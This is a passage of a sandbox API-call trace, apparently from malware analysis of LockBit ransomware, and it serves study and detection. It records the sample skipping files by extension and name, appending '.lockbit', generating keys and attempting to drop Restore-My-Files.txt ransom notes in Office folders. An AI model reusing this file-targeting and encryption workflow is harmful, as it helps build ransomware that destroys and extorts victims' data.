lstrcmpiW (lpString1=".ocx", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".mpa", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".cpl", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".mod", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".hta", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".icns", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".prf", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".rtp", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".diagcfg", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".msstyles", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".bin", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".hlp", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".shs", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".drv", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".wpx", lpString2=".VSL") returned 1 [0210.378] lstrcmpiW (lpString1=".bat", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".rom", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".msc", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".spl", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".ps1", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".msu", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".ics", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".key", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".mp3", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".reg", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".dll", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".ini", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".idx", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".sys", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".hlp", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".ico", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".lnk", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".rdp", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".lockbit", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AECUTILS.VSL") returned 1 [0210.379] lstrcmpiW (lpString1="ntldr", lpString2="AECUTILS.VSL") returned 1 [0210.379] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AECUTILS.VSL") returned 1 [0210.379] lstrcmpiW (lpString1="bootsect.bak", lpString2="AECUTILS.VSL") returned 1 [0210.379] lstrcmpiW (lpString1="autorun.inf", lpString2="AECUTILS.VSL") returned 1 [0210.379] lstrcmpiW (lpString1="thumbs.db", lpString2="AECUTILS.VSL") returned 1 [0210.379] lstrcmpiW (lpString1="iconcache.db", lpString2="AECUTILS.VSL") returned 1 [0210.379] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.379] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned=".VSL" [0210.379] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0210.379] lstrcmpiW (lpString1=".7z", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".ckp", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".dacpac", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".db", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".db-shm", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".db-wal", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".db3", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".dbc", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".dbs", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".dbt", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".dbv", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".frm", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".mdf", lpString2=".VSL") returned -1 [0210.379] lstrcmpiW (lpString1=".mrg", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".mwb", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".myd", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".ndf", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".qry", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".sdb", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".sdf", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".sql", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".sqlite", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".sqlite3", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".sqlitedb", lpString2=".VSL") returned -1 [0210.380] lstrcmpiW (lpString1=".tmd", lpString2=".VSL") returned -1 [0210.380] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.lockbit") returned 69 [0210.380] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.382] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.382] malloc (_Size=0x40068) returned 0x3df0008 [0210.382] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=41864) returned 1 [0210.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.383] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.387] malloc (_Size=0xa0) returned 0x2073f40 [0210.388] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0xa0, FileInformationClass=0xa) returned 0xc0000008 [0210.388] free (_Block=0x2073f40) [0210.388] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.388] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.388] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.388] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2b17900, ftCreationTime.dwHighDateTime=0x1c55530, ftLastAccessTime.dwLowDateTime=0x50598d80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe2b17900, ftLastWriteTime.dwHighDateTime=0x1c55530, nFileSizeHigh=0x0, nFileSizeLow=0x69e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ASSET.VRD", cAlternateFileName="")) returned 1 [0210.388] lstrcmpiW (lpString1=".", lpString2="ASSET.VRD") returned -1 [0210.388] lstrcmpiW (lpString1="..", lpString2="ASSET.VRD") returned -1 [0210.388] PathFindExtensionW (pszPath="ASSET.VRD") returned=".VRD" [0210.388] lstrcmpiW (lpString1=".386", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".cmd", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".exe", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".ani", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".adv", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".theme", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".msi", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".msp", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".com", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".diagpkg", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".nls", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".diagcab", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".lock", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".ocx", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".mpa", lpString2=".VRD") returned -1 [0210.388] lstrcmpiW (lpString1=".cpl", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".mod", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".hta", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".icns", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".prf", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".rtp", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".diagcfg", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".msstyles", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".bin", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".hlp", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".shs", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".drv", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".wpx", lpString2=".VRD") returned 1 [0210.389] lstrcmpiW (lpString1=".bat", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".rom", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".msc", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".spl", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".ps1", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".msu", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".ics", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".key", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".mp3", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".reg", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".dll", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".ini", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".idx", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".sys", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".hlp", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".ico", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".lnk", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".rdp", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1=".lockbit", lpString2=".VRD") returned -1 [0210.389] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ASSET.VRD") returned 1 [0210.390] lstrcmpiW (lpString1="ntldr", lpString2="ASSET.VRD") returned 1 [0210.390] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ASSET.VRD") returned 1 [0210.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="ASSET.VRD") returned 1 [0210.390] lstrcmpiW (lpString1="autorun.inf", lpString2="ASSET.VRD") returned 1 [0210.390] lstrcmpiW (lpString1="thumbs.db", lpString2="ASSET.VRD") returned 1 [0210.390] lstrcmpiW (lpString1="iconcache.db", lpString2="ASSET.VRD") returned 1 [0210.390] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.390] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned=".VRD" [0210.390] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0210.390] lstrcmpiW (lpString1=".7z", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".ckp", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".dacpac", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".db", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".db-shm", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".db-wal", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".db3", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".dbc", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".dbs", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".dbt", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".dbv", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".frm", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".mdf", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".mrg", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".mwb", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".myd", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".ndf", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".qry", lpString2=".VRD") returned -1 [0210.390] lstrcmpiW (lpString1=".sdb", lpString2=".VRD") returned -1 [0210.391] lstrcmpiW (lpString1=".sdf", lpString2=".VRD") returned -1 [0210.391] lstrcmpiW (lpString1=".sql", lpString2=".VRD") returned -1 [0210.391] lstrcmpiW (lpString1=".sqlite", lpString2=".VRD") returned -1 [0210.391] lstrcmpiW (lpString1=".sqlite3", lpString2=".VRD") returned -1 [0210.391] lstrcmpiW (lpString1=".sqlitedb", lpString2=".VRD") returned -1 [0210.391] lstrcmpiW (lpString1=".tmd", lpString2=".VRD") returned -1 [0210.391] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.lockbit") returned 66 [0210.391] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.392] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.392] malloc (_Size=0x40068) returned 0x3df0008 [0210.392] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1694) returned 1 [0210.392] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.393] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.393] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.393] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.402] malloc (_Size=0x9a) returned 0x1fab0b8 [0210.402] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fab0b8, Length=0x9a, FileInformationClass=0xa) returned 0xc0000008 [0210.402] free (_Block=0x1fab0b8) [0210.402] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.403] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.403] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.403] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3375600, ftCreationTime.dwHighDateTime=0x1c2fe69, ftLastAccessTime.dwLowDateTime=0x505e5040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc3375600, ftLastWriteTime.dwHighDateTime=0x1c2fe69, nFileSizeHigh=0x0, nFileSizeLow=0x10d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BASIC.HTM", cAlternateFileName="")) returned 1 [0210.403] lstrcmpiW (lpString1=".", lpString2="BASIC.HTM") returned -1 [0210.403] lstrcmpiW (lpString1="..", lpString2="BASIC.HTM") returned -1 [0210.403] PathFindExtensionW (pszPath="BASIC.HTM") returned=".HTM" [0210.403] lstrcmpiW (lpString1=".386", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".cmd", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".exe", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".ani", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".adv", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".theme", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".msi", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".msp", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".com", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".diagpkg", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".nls", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".diagcab", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".lock", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".ocx", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".mpa", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".cpl", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".mod", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".hta", lpString2=".HTM") returned -1 [0210.403] lstrcmpiW (lpString1=".icns", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".prf", lpString2=".HTM") returned 1 [0210.403] lstrcmpiW (lpString1=".rtp", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".diagcfg", lpString2=".HTM") returned -1 [0210.404] lstrcmpiW (lpString1=".msstyles", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".bin", lpString2=".HTM") returned -1 [0210.404] lstrcmpiW (lpString1=".hlp", lpString2=".HTM") returned -1 [0210.404] lstrcmpiW (lpString1=".shs", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".drv", lpString2=".HTM") returned -1 [0210.404] lstrcmpiW (lpString1=".wpx", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".bat", lpString2=".HTM") returned -1 [0210.404] lstrcmpiW (lpString1=".rom", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".msc", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".spl", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".ps1", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".msu", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".ics", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".key", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".mp3", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".reg", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".dll", lpString2=".HTM") returned -1 [0210.404] lstrcmpiW (lpString1=".ini", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".idx", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".sys", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".hlp", lpString2=".HTM") returned -1 [0210.404] lstrcmpiW (lpString1=".ico", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".lnk", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".rdp", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1=".lockbit", lpString2=".HTM") returned 1 [0210.404] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BASIC.HTM") returned 1 [0210.404] lstrcmpiW (lpString1="ntldr", lpString2="BASIC.HTM") returned 1 [0210.404] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BASIC.HTM") returned 1 [0210.404] lstrcmpiW (lpString1="bootsect.bak", lpString2="BASIC.HTM") returned 1 [0210.404] lstrcmpiW (lpString1="autorun.inf", lpString2="BASIC.HTM") returned -1 [0210.404] lstrcmpiW (lpString1="thumbs.db", lpString2="BASIC.HTM") returned 1 [0210.404] lstrcmpiW (lpString1="iconcache.db", lpString2="BASIC.HTM") returned 1 [0210.404] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.405] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM") returned=".HTM" [0210.405] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".7z", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".ckp", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".dacpac", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".db", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".db-shm", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".db-wal", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".db3", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".dbc", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".dbs", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".dbt", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".dbv", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".frm", lpString2=".HTM") returned -1 [0210.405] lstrcmpiW (lpString1=".mdf", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".mrg", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".mwb", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".myd", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".ndf", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".qry", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".sdb", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".sdf", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".sql", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".sqlite", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".HTM") returned 1 [0210.405] lstrcmpiW (lpString1=".tmd", lpString2=".HTM") returned 1 [0210.405] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM.lockbit") returned 66 [0210.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\basic.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.407] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.408] malloc (_Size=0x40068) returned 0x3df0008 [0210.408] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=269) returned 1 [0210.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.408] BCryptGenRandom (in: hAlgorithm=0x0, 